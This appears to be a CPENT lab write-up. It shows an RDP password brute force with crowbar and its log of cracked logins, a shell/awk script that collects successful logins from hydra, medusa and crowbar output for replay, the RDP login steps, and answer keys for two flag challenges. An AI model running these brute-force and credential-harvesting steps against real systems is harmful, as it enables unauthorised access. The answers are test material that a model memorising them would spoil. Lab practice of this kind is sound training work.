┌──(root㉿kali)-[~]
└─# crowbar -b rdp -s 172.16.110.105/32 -U /home/kali/LPT_day3/Usernames-CPENT.txt -C /home/kali/LPT_day3/Passwords-CPENT.txt -v
2023-05-01 22:40:13 START
2023-05-01 22:40:13 Crowbar v0.4.2
2023-05-01 22:40:13 Brute Force Type: rdp
2023-05-01 22:40:13 Output File: /root/crowbar.out
2023-05-01 22:40:13 Log File: /root/crowbar.log
2023-05-01 22:40:13 Discover Mode: False
2023-05-01 22:40:13 Verbose Mode: 1
2023-05-01 22:40:13 Debug Mode: False
2023-05-01 22:40:13 Trying 172.16.110.105:3389
2023-05-01 22:40:13 LOG-RDP: 172.16.110.105:3389 - administrator:123456
2023-05-01 22:40:13 LOG-RDP: 172.16.110.105:3389 - administrator:password
2023-05-01 22:40:13 LOG-RDP: 172.16.110.105:3389 - administrator:12345678
... (many more attempts)
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:test123456
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:victor
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:puppettwo
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:studentpw
2023-05-01 22:40:59 RDP-SUCCESS : 172.16.110.105:3389 - kevin:Pa$$w0rd123
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:cpent123
2023-05-01 22:41:00 LOG-RDP: 172.16.110.105:3389 - kevin:cpent@123
2023-05-01 22:41:00 LOG-RDP: 172.16.110.105:3389 - kevin:cpent123456
2023-05-01 22:41:00 LOG-RDP: 172.16.110.105:3389 - kevin:cpentpw
... (many more attempts)
2023-05-01 22:44:40 LOG-RDP: 172.16.110.105:3389 - cpent:victor
2023-05-01 22:44:40 LOG-RDP: 172.16.110.105:3389 - cpent:puppettwo
2023-05-01 22:44:40 RDP-SUCCESS : 172.16.110.105:3389 - cpent:Pa$$w0rd123
2023-05-01 22:44:40 LOG-RDP: 172.16.110.105:3389 - cpent:studentpw
2023-05-01 22:44:40 LOG-RDP: 172.16.110.105:3389 - cpent:cpent123
2023-05-01 22:45:50 LOG-RDP: 172.16.110.105:3389 - :eccpw
2023-05-01 22:45:50 LOG-RDP: 172.16.110.105:3389 - :
2023-05-01 22:45:51 STOP
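Three tools, three output formats: hydra's "[port][proto] host: ... login: ... password: ...", medusa's "ACCOUNT FOUND:" and crowbar's "RDP-SUCCESS". The following is an added example (not from the original write-up) that normalises the success lines of all three into one "proto host user password" list so hits from several runs can be collected and replayed; the sample log is constructed from lines shown in this write-up, and the parser assumes usernames and passwords without whitespace, which is what these wordlists contain.

```shell
#!/bin/sh
# Added example, not from the original write-up: collect the successful logins
# out of hydra, medusa and crowbar output into one uniform list.
# Usage: extract_creds < hydra.log   (or cat *.log | extract_creds)

# Constructed sample built from lines shown in the write-up.
SAMPLE_LOG='[22][ssh] host: 172.16.110.230 login: kevin password: Pa$$w0rd123
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: cpent (28 of 34, 27 complete) Password: Pa$$w0rd123 (29 of 51 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.110.230 User: cpent Password: Pa$$w0rd123 [SUCCESS]
[3389][rdp] host: 172.16.110.105 login: kevin password: Pa$$w0rd123
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:test123456
2023-05-01 22:44:40 RDP-SUCCESS : 172.16.110.105:3389 - cpent:Pa$$w0rd123'

# extract_creds  (reads stdin)
# Emits one "proto host user password" line per hit; attempts and noise are
# dropped. Field-based parsing assumes no whitespace in user or password.
extract_creds() {
    awk '
        # hydra:  [PORT][proto] host: H login: U password: P
        /^\[[0-9]+\]\[[a-z0-9-]+\] host: / {
            proto = $1
            sub(/^\[[0-9]+\]\[/, "", proto)
            sub(/\]$/, "", proto)
            print proto, $3, $5, $7
            next
        }
        # medusa: ACCOUNT FOUND: [proto] Host: H User: U Password: P [SUCCESS]
        /^ACCOUNT FOUND: / {
            proto = $3
            sub(/^\[/, "", proto)
            sub(/\]$/, "", proto)
            print proto, $5, $7, $9
            next
        }
        # crowbar: DATE TIME RDP-SUCCESS : H:PORT - U:P
        # The password may itself contain ":", so split on the first one only.
        /RDP-SUCCESS : / {
            split($5, hp, ":")
            i = index($7, ":")
            print "rdp", hp[1], substr($7, 1, i - 1), substr($7, i + 1)
            next
        }
    '
}

# Demo on the embedded sample.
printf '%s\n' "$SAMPLE_LOG" | extract_creds
```

The two trailing crowbar attempts with an empty username (":eccpw" and ":") are worth noticing: hydra counted 35 logins and medusa 34 from the same file, which points at a blank trailing line in the username list that some tools skip and others try.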
Log in with the cracked credentials:
┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.110.105 -g 90%
Autoselecting keyboard map 'en-us' from locale
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=WIN-HPDDJG3FLDO
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=WIN-HPDDJG3FLDO
Issuer: CN=WIN-HPDDJG3FLDO
Valid From: Fri Mar 17 22:58:49 2023
To: Sat Sep 16 22:58:49 2023
Certificate fingerprints:
sha1: 317bdff0b74fc4a7fb1b8051c444b241e3b48f03
sha256: bb156d9fbf2ba5b97d021989ae6d280634307233b091e6c0f0f79b6aa384a04a
Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
rdesktop was run without -u/-p, so NLA (CredSSP) had nothing to authenticate with and it fell back to a plain TLS connection; use xfreerdp instead, passing the username explicitly. A second problem is the X display: running xfreerdp as root through MobaXterm's X11 forwarding fails to open the display because root does not hold the X authority cookie for the forwarded session, which lives in /home/kali/.Xauthority. Copying that file into /root (or pointing root's XAUTHORITY environment variable at it) fixes it; the mcookie call below turned out not to be needed.
Linux remote graphical interface error: MoTTY X11 proxy: Unsupported authorisation protocol - 时间的风景 - 博客园
x11 forwarding - How to fix "MobaXterm X11 proxy: Unsupported authorisation protocol" - Super User
┌──(root㉿kali)-[~]
└─# xfreerdp -h
MoTTY X11 proxy: Unsupported authorisation protocol
[02:26:05:255] [114263:114263] [ERROR][com.freerdp.client.x11] - failed to open display: localhost:11.0
[02:26:05:256] [114263:114263] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
┌──(root㉿kali)-[~]
└─# cp /home/kali/.Xauthority /root/
┌──(root㉿kali)-[/home/kali]
└─# mcookie
4abf4616d6350ce0ae35c50759bdc92f
┌──(root㉿kali)-[~]
└─# cp /home/kali/.Xauthority /root/
┌──(root㉿kali)-[~]
└─# xfreerdp -v:172.16.110.105 -u:cpent
[03:27:49:891] [145868:145885] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:27:49:892] [145868:145885] [WARN][com.freerdp.crypto] - CN = WIN-HPDDJG3FLDO
[03:27:49:894] [145868:145885] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:27:49:895] [145868:145885] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - The hostname used for this connection (172.16.110.105:3389)
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - Common Name (CN):
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - WIN-HPDDJG3FLDO
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 172.16.110.105:3389 (RDP-Server):
Common Name: WIN-HPDDJG3FLDO
Subject: CN = WIN-HPDDJG3FLDO
Issuer: CN = WIN-HPDDJG3FLDO
Thumbprint: bb:15:6d:9f:bf:2b:a5:b9:7d:02:19:89:ae:6d:28:06:34:30:72:33:b0:91:e6:c0:f0:f7:9b:6a:a3:84:a0:4a
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
Password:
Login screen (screenshot not preserved). The certificate warnings are expected: the certificate is self-signed with CN WIN-HPDDJG3FLDO and we connect by IP, and its SHA-256 thumbprint matches the one rdesktop printed earlier, so it is the same certificate, not an interception.
Found userflag (screenshot not preserved).
Get the MD5 with Get-FileHash; note it defaults to SHA256, so pass -Algorithm MD5 and take the last six hex digits of the hash:
Challenge 39: (40 Points)
Compromise the 172.25.100.105 machine to gain user-level access. Locate userflag.txt and submit the last 6 hex digits of the md5 hash of the file.
Ans: ECFE85
Logging in as kevin instead gives access to adminflag.txt (screenshot not preserved):
Same again, its MD5 (screenshot not preserved):
Challenge 40: (60 Points)
Escalate your privilege to that of an Administrator in the 172.25.100.105 machine, locate adminflag.txt and submit the last 6 hex digits of the md5 hash of the file.
Ans: 82FC58